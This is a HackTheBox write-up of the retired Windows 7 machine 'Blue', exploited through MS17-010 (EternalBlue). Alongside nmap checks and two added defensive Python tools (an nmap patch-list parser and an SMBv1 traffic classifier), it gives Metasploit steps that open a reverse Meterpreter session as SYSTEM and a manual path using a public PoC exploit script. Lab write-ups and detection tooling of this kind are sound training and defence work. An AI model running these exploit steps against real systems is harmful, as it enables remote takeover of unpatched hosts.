HackTheBox · Easy · 2024-04-02

Blue

Retired Windows machine vulnerable to EternalBlue — the NSA-leaked exploit that powered WannaCry. Textbook SMB exploitation.

Overview

Blue is a Windows 7 machine exploitable via MS17-010 (EternalBlue), the same vulnerability behind WannaCry and NotPetya. Direct path to SYSTEM — no privesc required.

Enumeration

nmap -sC -sV -p- --min-rate 5000 10.10.10.40
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows 7 Professional 7601 SP1

Check for MS17-010 explicitly:

nmap --script smb-vuln-ms17-010 -p 445 10.10.10.40
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0144

Confirmed vulnerable.
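The two nmap runs above confirm one host. On a real engagement or an internal audit the same script runs against a whole range, and what you want out of it is a patch list. The following Python is an added example, not part of this writeup: it parses nmap's normal-format output (the port line for 445 plus the smb-vuln-ms17-010 host script block) into per-host findings and separates confirmed-vulnerable hosts from hosts that expose SMB but could not be verified. The sample output embedded in it is constructed for the example (addresses and the second and third banners are made up); only the vulnerable block mirrors what nmap prints.

```python
"""Triage nmap normal-format output for MS17-010 / SMBv1 exposure.

Added example, not part of the original writeup. Reads the text that
`nmap -sV` and `--script smb-vuln-ms17-010` print (the -oN style shown
above) and turns a multi-host scan into a patch list.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: three hosts in nmap normal output. The addresses and
# the last two banners are invented for this example; the VULNERABLE block
# follows the real script output format.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.0.0.11
Host is up (0.012s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows 7 Professional 7601 SP1
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0144

Nmap scan report for 10.0.0.12
Host is up (0.009s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows 10 Pro 19041

Nmap scan report for 10.0.0.13
Host is up (0.020s latency).
PORT    STATE SERVICE      VERSION
445/tcp open  microsoft-ds Windows Server 2008 R2 Standard 7601
Host script results:
|_smb-vuln-ms17-010: ERROR: Script execution failed (use -d to debug)
"""


@dataclass
class HostFinding:
    address: str
    smb_open: bool = False
    os_banner: str = ""
    ms17_010: str = "unknown"          # "vulnerable" or "unknown"
    cves: list = field(default_factory=list)


HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^445/tcp\s+open\s+\S+\s*(.*)$")
SCRIPT_RE = re.compile(r"^\|_?\s*smb-vuln-ms17-010:")
CVE_RE = re.compile(r"CVE:(CVE-\d{4}-\d+)")


def parse_nmap_output(text):
    """Return one HostFinding per 'Nmap scan report' block in the text."""
    hosts = []
    current = None
    in_script = False
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = HostFinding(address=m.group(1))
            hosts.append(current)
            in_script = False
            continue
        if current is None:
            continue
        m = PORT_RE.match(line)
        if m:
            current.smb_open = True
            current.os_banner = m.group(1).strip()
            continue
        if SCRIPT_RE.match(line):
            in_script = True            # multi-line block or single "|_" line
            continue
        if in_script:
            if not line.startswith("|"):
                in_script = False       # script block ended
                continue
            if "State: VULNERABLE" in line:
                current.ms17_010 = "vulnerable"
            current.cves.extend(CVE_RE.findall(line))
    return hosts


def summarize(hosts):
    """Split hosts into a patch list and an SMB-exposed-but-unverified list."""
    return {
        "vulnerable": [h.address for h in hosts if h.ms17_010 == "vulnerable"],
        "smb_open_unverified": [h.address for h in hosts
                                if h.smb_open and h.ms17_010 != "vulnerable"],
    }


if __name__ == "__main__":
    for host in parse_nmap_output(SAMPLE_NMAP_OUTPUT):
        print(host)
    print(summarize(parse_nmap_output(SAMPLE_NMAP_OUTPUT)))
```

Run it against a saved `-oN` file by replacing `SAMPLE_NMAP_OUTPUT` with the file contents. Hosts that land in `smb_open_unverified` are not cleared: the script needs a null session to the IPC$ share to test, so a failed check is a reason to verify patch level on the host itself, not a pass.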

Exploitation

msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.40
set LHOST 10.10.14.5
run
[*] Meterpreter session 1 opened
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Immediate SYSTEM — grab both flags from here.

Manual path (without Metasploit)

Using the Python PoC from the worawit repo:

git clone https://github.com/worawit/MS17-010
python checker.py 10.10.10.40
python zzz_exploit.py 10.10.10.40

zzz_exploit.py sends a crafted SMBv1 transaction that triggers the buffer overflow in srv.sys; the shellcode then runs in kernel context.
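Because the whole manual path rides on SMBv1 transaction commands, the cheapest network-side control is to notice SMBv1 being used at all. The Python below is an added example, not part of this writeup or of the worawit repository: it parses the header of one NetBIOS session message from TCP/445, tells SMBv1 from SMB2/3 by the protocol magic, and counts SMBv1 messages seen after negotiate, marking the transaction family (Trans2, NT Trans and their secondaries) separately. The sample messages are constructed by hand with the helper builders in the block, not captured traffic; the command codes and header offsets are the MS-CIFS and MS-SMB2 values.

```python
"""Tell SMBv1 from SMB2/3 on the wire and flag SMBv1 transaction commands.

Added example, not part of the original writeup. Input is the raw bytes of
one NetBIOS session message as carried on TCP/445. The samples at the bottom
are constructed for this example, not captured traffic.
"""
import struct

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"

# SMBv1 command codes (MS-CIFS). The transaction family is where the crafted
# requests described above travel; on an estate with SMBv1 disabled, none of
# them should appear after the initial negotiate.
SMB1_COMMANDS = {
    0x72: "SMB_COM_NEGOTIATE",
    0x73: "SMB_COM_SESSION_SETUP_ANDX",
    0x75: "SMB_COM_TREE_CONNECT_ANDX",
    0x25: "SMB_COM_TRANSACTION",
    0x26: "SMB_COM_TRANSACTION_SECONDARY",
    0x32: "SMB_COM_TRANSACTION2",
    0x33: "SMB_COM_TRANSACTION2_SECONDARY",
    0xA0: "SMB_COM_NT_TRANSACT",
    0xA1: "SMB_COM_NT_TRANSACT_SECONDARY",
}
SMB1_TRANSACTION_FAMILY = {0x25, 0x26, 0x32, 0x33, 0xA0, 0xA1}


def classify_smb_message(data):
    """Parse one NetBIOS session message; return a summary dict or None if not SMB."""
    if len(data) < 36 or data[0] != 0x00:        # 0x00 = NetBIOS session message
        return None
    length = int.from_bytes(data[1:4], "big")
    payload = data[4:4 + length]
    if len(payload) < 32:                        # shorter than any SMB header
        return None
    magic = payload[:4]
    if magic == SMB1_MAGIC:
        cmd = payload[4]                         # Command, 1 byte
        _status, flags, _flags2 = struct.unpack_from("<IBH", payload, 5)
        return {
            "dialect": "SMB1",
            "command": SMB1_COMMANDS.get(cmd, "0x%02X" % cmd),
            "transaction_family": cmd in SMB1_TRANSACTION_FAMILY,
            "is_response": bool(flags & 0x80),   # SMB_FLAGS_REPLY
        }
    if magic == SMB2_MAGIC:
        _size, _credit, _status, command = struct.unpack_from("<HHIH", payload, 4)
        flags = struct.unpack_from("<I", payload, 16)[0]
        return {
            "dialect": "SMB2+",
            "command": "0x%04X" % command,
            "transaction_family": False,
            "is_response": bool(flags & 0x1),    # SMB2_FLAGS_SERVER_TO_REDIR
        }
    return None


def smb1_findings(messages):
    """Summarise one capture. A lone SMBv1-format SMB_COM_NEGOTIATE is normal:
    SMB2-capable clients open with it and list "SMB 2.???" dialects. Anything
    after negotiate in SMBv1 format means the SMBv1 dialect was selected."""
    summary = {"smb1_negotiate": 0, "smb1_post_negotiate": 0,
               "smb1_transaction": 0, "smb2": 0, "other": 0}
    for data in messages:
        info = classify_smb_message(data)
        if info is None:
            summary["other"] += 1
        elif info["dialect"] != "SMB1":
            summary["smb2"] += 1
        elif info["command"] == "SMB_COM_NEGOTIATE":
            summary["smb1_negotiate"] += 1
        else:
            summary["smb1_post_negotiate"] += 1
            if info["transaction_family"]:
                summary["smb1_transaction"] += 1
    return summary


def _netbios(payload):
    return b"\x00" + len(payload).to_bytes(3, "big") + payload


def sample_smb1(command, reply=False):
    """Constructed SMBv1 message: 32-byte header, WordCount 0, ByteCount 0."""
    flags = 0x80 if reply else 0x18
    header = (SMB1_MAGIC + bytes([command])
              + struct.pack("<IBH", 0, flags, 0xC807)   # Status, Flags, Flags2
              + b"\x00" * 2 + b"\x00" * 8 + b"\x00" * 2  # PIDHigh, Signature, Reserved
              + struct.pack("<HHHH", 0, 0xFEFF, 0, 0))   # TID, PIDLow, UID, MID
    return _netbios(header + b"\x00" + b"\x00\x00")


def sample_smb2(command, reply=False):
    """Constructed SMB2 message: 64-byte header only."""
    header = (SMB2_MAGIC + struct.pack("<HHIH", 64, 0, 0, command)
              + struct.pack("<HIIQ", 1, 0x1 if reply else 0, 0, 0)
              + b"\x00" * 32)
    return _netbios(header)


SAMPLE_CAPTURE = [
    sample_smb1(0x72),              # SMBv1-format negotiate (normal from any client)
    sample_smb2(0x0000),            # SMB2 NEGOTIATE
    sample_smb1(0x32),              # SMBv1 TRANSACTION2: SMBv1 dialect in use
    sample_smb1(0xA0),              # SMBv1 NT_TRANSACT
    sample_smb1(0x25, reply=True),  # SMBv1 TRANSACTION response
    b"\x00\x00\x00\x03GET",         # not SMB at all
]

if __name__ == "__main__":
    print(smb1_findings(SAMPLE_CAPTURE))
```

Feed it the reassembled TCP payloads of a port 445 stream (one NetBIOS session message per call) and alert on any non-zero `smb1_post_negotiate`; the `smb1_transaction` count tells you whether the session went on to use the commands this exploit path depends on.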

Notes

  • SMBv1 must be enabled for this to work — Windows 7 has it on by default.
  • The overflow happens in the SrvOs2FeaListSizeToNt function — incorrect size calculation leads to a pool overflow.
  • EternalBlue was developed by the NSA, leaked by Shadow Brokers in April 2017, and weaponized within weeks.